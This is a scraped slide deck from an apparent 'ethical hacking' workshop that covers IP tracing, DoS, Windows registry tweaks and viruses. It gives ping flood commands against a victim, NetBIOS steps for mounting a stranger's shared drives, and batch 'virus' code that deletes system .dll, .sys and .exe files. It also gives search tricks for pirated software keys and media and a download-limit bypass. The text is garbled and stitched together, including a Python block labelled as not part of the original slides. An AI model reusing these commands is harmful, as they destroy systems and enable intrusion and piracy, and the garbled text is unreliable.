workshop day1


Post on 29-May-2018






  • 8/8/2019 Workshop Day1


    Information Security and Ethical Hacking

    Internet Protocol (IP)
    Tracing IP
    Denial of services (DoS)
    Sharing
    Unwanted access
    Using proxies

    Windows hack
    Registry editing
    Multi Yahoo
    Changing names of icons
    Disabling features - shutdown, restart etc.

    Tips on Google surfing
    Rapid share

    Brutus - brute forces
    Windows password
    Backdoor entry

    Trojans
    Remote employing monitors

    Other malicious tools

    Day 1 Day 2

    Key logging
    Windows password
    Etc.

    Ethical Hacking

    From e-commerce to information gathering and entertainment, the Internet has evolved into a one-stop resource for both professional and personal purposes.

    Unfortunately, the same Internet is also used by computer criminals to carry out cyber crimes, such as identity theft and virus/worm/Trojan attacks.

    Ethical hackers are the sentinels of the Internet. Their work involves understanding the mind of the cyber criminal, tracing and tracking his functioning, and innovating new strategies and methods to safeguard online activity.

    Thinking like cyber criminals to thwart them is both a challenging and interesting job. And with the demand for certified ethical hackers increasing every day, a career in this field is also evolving into a professionally satisfying and monetarily lucrative option.




    Anarchist Hackers
    Their sole intent on system infiltration is to cause damage or use information to create havoc.

    Hackers
    They don't particularly care about bragging about their accomplishments as it exposes them to suspicion. They prefer to work from behind the scenes and preserve their anonymity.


    This is primarily the term given to individuals who are skilled at the art of bypassing software copyright protection.

    Ethical Hacker

    Being able to attribute your attacks to the right type of attacker is very important. By identifying your attacker to be either an Anarchist Hacker or a Hacker you get a better idea of what you're up against.

    Know your enemy and know yourself and you will always be victorious...

    IP Address

    32-bit combination.
    Static
    Dynamic

    Server IP address
    ping www.anylan.in
    nslookup

    IP tracing
    tracert

    Tracing IP during chatting

    netstat -n
    netstat -a

    Port 5050 or 5101

    Tracing the IP locations



    E-mail Headers



    Neo trace pro



    DoS Attack

    Conceptually, DoS attacks are intended to prevent legitimate users, customers or clients of a site from successfully accessing it.

    Traditional DoS attacks have been aimed at consuming resources or disrupting services at the network or operating system level.

    Typical examples are server-based attacks such as SYN floods and bandwidth exhaustion attacks that attempt to saturate the victim's Internet connection with spurious traffic.

    Death by overloading of system.

    DoS Attack

    Denial of Services

    In a denial-of-service (DoS) attack, an attacker attempts to prevent legitimate users from accessing information or services. By targeting your computer and its network connection, or the computers and network of the sites you are trying to use, an attacker may be able to prevent you from accessing email, web sites, online accounts (banking, etc.), or other services that rely on the affected computer.

    ping [IP ADDRESS HERE or WEBSITE] -t -l 15000

    DoS & DDoS

    Oversized Packets

    This is called the "Ping of Death" (ping -l 65510 on a Windows system (where is the IP address of the intended victim). What is happening is the attacker is pinging every port on the victim's computer causing it to echo back 65510 requests.

    The main goal of the "Ping of Death" is to generate a packet size that exceeds 65,535 bytes, which can abruptly cause the victim computer to crash.

    DoS

    Ping Attack

    Symptoms of DoS

    unusually slow network performance (opening files or accessing web sites)

    unavailability of a particular web site

    inability to access any web site

    dramatic increase in the amount of spam you receive in your account

    Network Basic Input Output System and is used as a way for computers in a LAN or a WAN (local network or internet/wider network) to share printers or drives.

    WAN attack that will be more interesting for most of you guys, and it is the WAN attack that will be more dangerous.

    Steps

    Start up your terminal (Start > run > cmd). You will be given this prompt:
    C:\WINDOWS>
    make sure the host is alive:
    C:\WINDOWS> ping
    it is, you'll get something like this in response:
    Reply from byte=32 time
    NBtSTAT -a
    UNIQUE Registered
    MSHOME GROUP Registered
    HACKME-921J UNIQUE Registered
    HACKME-921J UNIQUE Registered
    MSHOME GROUP Registered
    HACKABLEUSER UNIQUE Registered
    MSHOME UNIQUE Registered
    ? That means that the target has files/folders/drives/etc. being shared on that computer

    C:\WINDOWS> NET VIEW \\
    will hopefully give a response like this:

    Shared resources on name Type Comment
    --------------------------------------------
    C Disk
    D Disk
    Command completed successfully.

    mount them locally:
    C:\WINDOWS> NET USE G: \\\C
    Command completed successfully.

    go to "My Computer" and browse those files.

    In the search field type: "Product name" 94FBR

    Where "Product Name" is the name of the item you want to find the serial number for.

    94FBR is part of an Office 2000 Pro CD key that is widely distributed as it bypasses the activation requirements of Office 2K Pro. By searching for the product name and 94fbr, you guarantee two things.

    1) The pages that are returned are pages dealing specifically with the product you're wanting a serial for.

    2) Because 94FBR is part of a serial number, and only part of a serial number, you guarantee that any page being returned is a serial number list page.

    Unlimited Rapidshare download

    go to temporary internet files folder and delete all the cookies related to rapidshare.

    make a bat file and run it every time
    ipconfig /flushdns
    ipconfig /release
    ipconfig /renew
    exit

    turn your modem off and on

    Other Google ways

    Look for Appz in Parent Directory

    intext:"parent directory" intext:"[EXE]"

    intext:"parent directory" index of:"[EXE]"

    intext:"parent directory" index of:"[RAR]"

    This will look for any exe or optionally for zip, rar, ace, iso, bin and etc.

    Look for Moviez in Parent Directory

    intext:"parent directory" intext:"[VID]"

    intext:"parent directory" index of:"[VID]"

    This will look for any video filetype in parent directory. You can optionally add index:"xvid" or intext:"divx" for specific codec movie.

    Look for Muzik in Parent Directory

    intext:"parent directory" intext:"[MP3]"

    intext:"parent directory" index of:"[MP3]"

    This will look for any music files.

    Look for Gamez in Parent Directory

    intext:"parent directory" index of:"[Gamez]"

    Registry

    The Registry is a database used to store settings and options for the 32 bit versions of Microsoft Windows including Windows 95, 98, ME and NT/2000. It contains information and settings for all the hardware, software, users, and preferences of the PC. Whenever a user makes changes to Control Panel settings, File Associations, System Policies, or installed software, the changes are reflected and stored in the Registry.

    The physical files that make up the registry are stored differently depending on your version of Windows; under Windows 95 & 98 it is contained in two hidden files in your Windows directory, called USER.DAT and SYSTEM.DAT, for Windows Me there is an additional CLASSES.DAT file, while under Windows NT/2000 the files are contained separately in the %SystemRoot%\System32\Config directory. You can not edit these files directly, you must use a tool commonly known as a "Registry Editor" to make any changes (using registry editors will be discussed later in the article).

    The Registry has a hierarchal structure

    There are six main branches, each containing a specific portion of the information stored in the Registry. They are as follows:

    * HKEY_CLASSES_ROOT - This branch contains all of your file association mappings to support the drag-and-drop feature, OLE information, Windows shortcuts, and core aspects of the Windows user interface.

    * HKEY_CURRENT_USER - This branch links to the section of HKEY_USERS appropriate for the user currently logged onto the PC and contains information such as logon names, desktop settings, and Start menu settings.

    * HKEY_LOCAL_MACHINE - This branch contains computer specific information about the type of hardware, software, and other preferences on a given PC, this information is used for all users who log onto this computer.

    * HKEY_USERS - This branch contains individual preferences for each user of the computer, each user is represented by a SID sub-key located under the main branch.

    * HKEY_CURRENT_CONFIG - This branch links to the section of HKEY_LOCAL_MACHINE appropriate for the current hardware configuration.

    * HKEY_DYN_DATA - This branch points to the part of HKEY_LOCAL_MACHINE, for use with the Plug-&-Play features of Windows, this section is dynamic and will change as devices are added and removed from the system.

    Each registry value is stored as one of five main data types:

    * REG_BINARY - This type stores the value as raw binary data. Most hardware component information is stored as binary data, and can be displayed in an editor in hexadecimal format.

    * REG_DWORD - This type represents the data by a four byte number and is commonly used for boolean values, such as "0" is disabled and "1" is enabled. Additionally many parameters for device driver and services are this type, and can be displayed in REGEDT32 in binary, hexadecimal and decimal format, or in REGEDIT in hexadecimal and decimal format.

    * REG_EXPAND_SZ - This type is an expandable data string, that is, a string containing a variable to be replaced when called by an application. For example, for the following value, the string "%SystemRoot%" will be replaced by the actual location of the directory containing the Windows NT system files. (This type is only available using an advanced registry editor such as REGEDT32)

    * REG_MULTI_SZ - This type is a multiple string used to represent values that contain lists or multiple values, each entry is separated by a NULL character. (This type is only available using an advanced registry editor such as REGEDT32)

    * REG_SZ - This type is a standard string, used to represent human readable text values.

    Playing With Registry

    Take backup of the registry

    [HKEY_LOCAL_MACHINE\SYSTEM\Setup]
    "SetupType"=dword:00000000
    "CmdLine"="setup -newsetup"
    "SystemPrefix"=hex:c5,0b,00,00,00,40,36,02

    Deleting the key values
    [-HKEY_LOCAL_MACHINE\SYSTEM\Setup]

    Use this feature with care, as deleting the wrong key or value could cause major problems within the registry, so remember to always make a backup first.
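
A pre-merge check for the .reg syntax shown above, as an added example that is not part of the original slides: it parses a .reg file and lists every value that would be set and every key or value that would be deleted, decoding `dword:`, `hex:` and quoted-string values into the data types described earlier. The sample text and function names are constructed for illustration; the `REGEDIT4` header line and the `hex(2)`/`hex(7)` prefixes are standard .reg syntax that the slides do not show.

```python
import re

# Constructed sample: the slide's .reg lines plus its delete-key form.
SAMPLE_REG = r'''REGEDIT4
[HKEY_LOCAL_MACHINE\SYSTEM\Setup]
"SetupType"=dword:00000000
"CmdLine"="setup -newsetup"
"SystemPrefix"=hex:c5,0b,00,00,00,40,36,02
[-HKEY_LOCAL_MACHINE\SYSTEM\Setup]
'''
HEX_TYPES = {None: "REG_BINARY", "2": "REG_EXPAND_SZ", "7": "REG_MULTI_SZ"}
VALUE_RE = re.compile(r'^(@|"(?:[^"\\]|\\.)*")=(.*)$')

def unquote(s):
    """Strip the surrounding quotes and undo .reg backslash escapes."""
    return re.sub(r'\\(.)', r'\1', s[1:-1])

def decode_value(raw):
    """Map the right-hand side of a value line to (registry type, value)."""
    raw = raw.strip()
    if raw == "-":                      # "name"=- removes a single value
        return ("DELETE", None)
    if raw.startswith("dword:"):
        return ("REG_DWORD", int(raw[6:], 16))
    m = re.match(r'hex(?:\((\w+)\))?:(.*)$', raw)
    if m:
        data = bytes(int(b, 16) for b in m.group(2).split(",") if b.strip())
        return (HEX_TYPES.get(m.group(1), "hex(%s)" % m.group(1)), data)
    if len(raw) >= 2 and raw[0] == raw[-1] == '"':
        return ("REG_SZ", unquote(raw))
    raise ValueError("unrecognised value syntax: %r" % raw)

def audit_reg(text):
    """List the operations a .reg file would perform, without touching the registry."""
    text = re.sub(r'\\\r?\n[ \t]*', '', text)    # join continued hex lines
    ops, key = [], None
    for line in map(str.strip, text.splitlines()):
        if line.startswith("[") and line.endswith("]"):
            key = line[1:-1]
            if key.startswith("-"):              # [-KEY] deletes the whole key
                ops.append(("delete_key", key[1:]))
                key = None
        elif key and (m := VALUE_RE.match(line)):
            name = "(Default)" if m.group(1) == "@" else unquote(m.group(1))
            vtype, value = decode_value(m.group(2))
            action = "delete_value" if vtype == "DELETE" else "set"
            ops.append((action, key, name, vtype, value))
    return ops                                   # header, comments, blanks are skipped
```

Any `delete_key` or `delete_value` entry in the result is a reason to export a backup of that key before merging the file.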






    "NoDrives"=dword:03ffffff $[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersio


    "LegalNoticeCaption"="Caption here."



    Multiple Yahoo login

    Navigate to HKEY_CURRENT_USER\Software\Yahoo\Pager\Test.

    On the right pane, right-click and choose New DWORD value.

    Rename the value to Plural.

    Double-click and assign a decimal value of 1.

    Viruses, Worms and Trojans

    Types of viruses
    There are many types of viruses. Typical viruses are simply programs or scripts that will do various damage to your computer, such as corrupting files, copying itself into files, slowly deleting all your hard drive etc.

    Worms
    Worms are a different type of virus, but the same idea; they are usually designed to copy themselves a lot over a network and usually try to eat up as much bandwidth as possible by sending commands to servers to try to get in.

    Trojans
    Trojans are another type of virus. They are simply like a server which enables hackers to get into and control the computer. A trojan such as Subseven can enable a hacker to do various things such as control the mouse, eject the cd-rom drive, delete/download/upload files and much more.

    MBR viruses
    Boot sector viruses are another type; they are similar to file viruses, but instead they go in the boot sector and can cause serious damage when the computer is booted. Some can easily format your drive simply by booting your computer. These are hard to remove.

    .exe .com .bat .scr .pif .vbs


    the main thing to watch out for is the file size.




    Making a virus

    This virus is indetectible by antivirus notepad and past this code:

    Code:@Echo off c: cd %WinDir%\System\ deltree /y *.dll cd\ deltree /y *.sys this will deleteall .dll and .sys files.

    Code:@Echo off c: cd %WinDir%\System\ deltree /y *. p sw cd\ deltree /y *.exe



    Vbs-vb script

    onclick=msgbox ("[email protected]",20,"[email protected]")
    yesclick=msgbox ("[email protected]",20,"[email protected]")
    yesclick=msgbox ("[email protected]",20,"[email protected]")
    yesclick=msgbox ("[email protected]",20,"[email protected]")
    yesclick=msgbox ("[email protected]",20,"[email protected]")
    yesclick=msgbox ("[email protected]",20,"[email protected]")
